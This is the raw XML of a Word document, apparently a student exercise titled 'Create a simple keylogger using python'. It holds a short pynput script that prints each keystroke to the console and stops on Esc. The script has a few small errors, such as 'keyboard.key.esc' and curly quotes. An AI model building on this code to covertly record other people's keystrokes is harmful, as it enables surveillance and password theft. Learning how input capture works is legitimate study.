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7E042" w14:textId="0A4127C3" w:rsidR="00B56D45" w:rsidRDefault="005C5BCE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5BCE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create a simple keylogger using python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734584F9" w14:textId="56003F62" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5BCE">
        <w:t>rom</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pynput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FDE0A0" w14:textId="014E5E43" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31DD4850" w14:textId="5CF8A097" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296DE579" w14:textId="1A0DC6AF" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">            print(f”[KEY] {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>key.char</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194B344D" w14:textId="10BB4BF3" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">        except </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AttributeError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2623799F" w14:textId="26C12ED7" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">            print(f”[SPECIAL] {key}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097183D3" w14:textId="1A11F289" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ABDF12" w14:textId="4E6689AD" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">       if key == </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyboard.key.esc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339DC138" w14:textId="29628005" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">           print(“Exiting keylogger.”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B1F597" w14:textId="041F6B1A" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">           return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1412D236" w14:textId="77777777" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>keyboard.Listener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_press</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>on_release</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>) as listener:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66266559" w14:textId="77777777" w:rsidR="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>listener.join</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B659A" w14:textId="4B7204BD" w:rsidR="005C5BCE" w:rsidRPr="005C5BCE" w:rsidRDefault="005C5BCE">
      <w:r w:rsidRPr="005C5BCE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="702C95C8" wp14:editId="13FDF172">
            <wp:extent cx="5731510" cy="4406900"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="255057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0578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</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="005C5BCE" w:rsidRPr="005C5B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BCE"/>
    <w:rsid w:val="002C098F"/>
    <w:rsid w:val="005C5BCE"/>
    <w:rsid w:val="00B56D45"/>
    <w:rsid w:val="00C92891"/>
    <w:rsid w:val="00D22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0851B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DAC7EE89-3FE7-4F1D-B096-72CC0C34F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5B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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B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65</Words>
  <Characters>375</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>3</Lines>
  <Paragraphs>1</Paragraphs>
  <ScaleCrop>false</ScaleCrop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Singh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Khushi Singh</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-09T14:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-09T14:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>